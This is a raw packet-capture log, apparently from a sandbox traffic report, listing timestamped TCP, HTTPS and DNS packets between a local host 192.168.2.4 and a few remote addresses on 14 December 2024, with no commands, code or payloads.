                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.711543083 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.711575031 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.711599112 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.713623047 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.713677883 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.713686943 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.713726997 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.715667963 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.715749025 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.715771914 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.715790033 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.717714071 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.717812061 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.717822075 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.717926025 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.719821930 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.719918013 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.719934940 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.719974041 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.721903086 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.721963882 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.722028017 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.722104073 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.724025965 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.724153996 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.724163055 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.724240065 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.726090908 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.726125956 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.726193905 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.726231098 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.728176117 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.728274107 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.728285074 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.728370905 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.730483055 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.730531931 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.730848074 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.730886936 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.732469082 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.732517958 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.732539892 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.732619047 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.734476089 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.734549046 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.734568119 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.734606981 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.736534119 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.736628056 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.736648083 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.736764908 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.738660097 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.738709927 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.738753080 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.738753080 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.740792990 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.740806103 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.740852118 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.740869045 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.742842913 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.742943048 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.742985964 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.742985964 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.744962931 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.745012045 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.745138884 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.745178938 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.747046947 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.747178078 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.747217894 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.747217894 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.749114990 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.749162912 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.749239922 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.749449015 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.751192093 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.751302004 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.751390934 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.751390934 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.754370928 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.754384995 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.754420042 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.754508018 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.828269958 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.828425884 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.828469038 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.828527927 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.828919888 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.828988075 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.829025030 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.829061985 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.830667973 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.830723047 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.830759048 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.830854893 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.832334995 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.832391977 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.832431078 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.832483053 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.834009886 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.834115982 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.834266901 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.834314108 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.835658073 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.835757971 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.835802078 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.835802078 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.837269068 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.837327003 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.837335110 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.837409019 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.838920116 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.838975906 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.839040995 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.839194059 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.840462923 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.840575933 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.840588093 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.840672016 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.841993093 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.842127085 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.842185974 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.842185974 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.843552113 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.843619108 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.843687057 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.843750954 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.845083952 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.845144987 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.845185041 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.845288992 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.846575022 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.846635103 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.846693039 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.846774101 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.848093033 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.848165989 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.848208904 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.848254919 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.849579096 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.849684000 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.849689960 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.849761963 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.851056099 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.851121902 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.851186037 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.851269960 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.852504015 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.852596998 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.852638006 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.852715969 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.853940010 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.854033947 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.854043961 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.854099035 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.855380058 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.855436087 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.855474949 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.855534077 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.856782913 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.856843948 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.856904984 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.856983900 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.858261108 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.858318090 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.858340979 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.858423948 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.859685898 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.859770060 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.859776974 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.859891891 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.861054897 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.861151934 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.861167908 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.861385107 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.862412930 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.862468004 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.862512112 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.862581015 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.811543941 CET49732443192.168.2.4104.21.22.222
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.811624050 CET44349732104.21.22.222192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.811717987 CET49732443192.168.2.4104.21.22.222
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.813087940 CET49732443192.168.2.4104.21.22.222
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.813102961 CET44349732104.21.22.222192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:53.126835108 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:53.126924992 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:54.029237986 CET44349732104.21.22.222192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:54.029381037 CET49732443192.168.2.4104.21.22.222
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:54.095278978 CET49732443192.168.2.4104.21.22.222
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:54.095321894 CET44349732104.21.22.222192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:54.095658064 CET44349732104.21.22.222192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:54.142155886 CET49732443192.168.2.4104.21.22.222
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:54.375416040 CET49732443192.168.2.4104.21.22.222
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:54.375463963 CET49732443192.168.2.4104.21.22.222
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:54.375593901 CET44349732104.21.22.222192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.157847881 CET44349732104.21.22.222192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.157947063 CET44349732104.21.22.222192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.158135891 CET49732443192.168.2.4104.21.22.222
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.170505047 CET49732443192.168.2.4104.21.22.222
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.170540094 CET44349732104.21.22.222192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.319282055 CET49733443192.168.2.4104.21.96.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.319350004 CET44349733104.21.96.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.319422007 CET49733443192.168.2.4104.21.96.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.319844961 CET49733443192.168.2.4104.21.96.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:56.319861889 CET44349733104.21.96.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:57.535135984 CET44349733104.21.96.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:57.535218000 CET49733443192.168.2.4104.21.96.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:57.537632942 CET49733443192.168.2.4104.21.96.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:57.537642956 CET44349733104.21.96.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:57.537894011 CET44349733104.21.96.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:57.539441109 CET49733443192.168.2.4104.21.96.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:57.539472103 CET49733443192.168.2.4104.21.96.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:57.539515972 CET44349733104.21.96.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.016767979 CET44349733104.21.96.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.016879082 CET44349733104.21.96.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.017143011 CET49733443192.168.2.4104.21.96.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.017544985 CET49733443192.168.2.4104.21.96.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.017544985 CET49733443192.168.2.4104.21.96.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.017560959 CET44349733104.21.96.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:59.017569065 CET44349733104.21.96.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:00.083678961 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:00.083753109 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:00.083843946 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:00.084988117 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:00.085004091 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:01.486270905 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:01.486387968 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:01.488418102 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:01.488451958 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:01.488784075 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:01.490008116 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:01.535330057 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.327399969 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.327440023 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.327459097 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.327661037 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.327661037 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.327717066 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.327766895 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.515611887 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.515685081 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.515707970 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.515753984 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.515800953 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.541239977 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.541289091 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.541299105 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.541320086 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.541357994 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.541372061 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.541409016 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.545124054 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.545141935 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.545160055 CET49735443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                              Dec 14, 2024 14:13:02.545166016 CET4434973523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:14:34.049189091 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:14:34.361044884 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:14:34.970431089 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:14:36.173592091 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:14:38.579874039 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:14:43.392391920 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:14:52.999969006 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:44.092628956 CET6459453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:44.230386972 CET53645941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.521399021 CET5264453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.659321070 CET53526441.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:52.661006927 CET5294853192.168.2.41.1.1.1
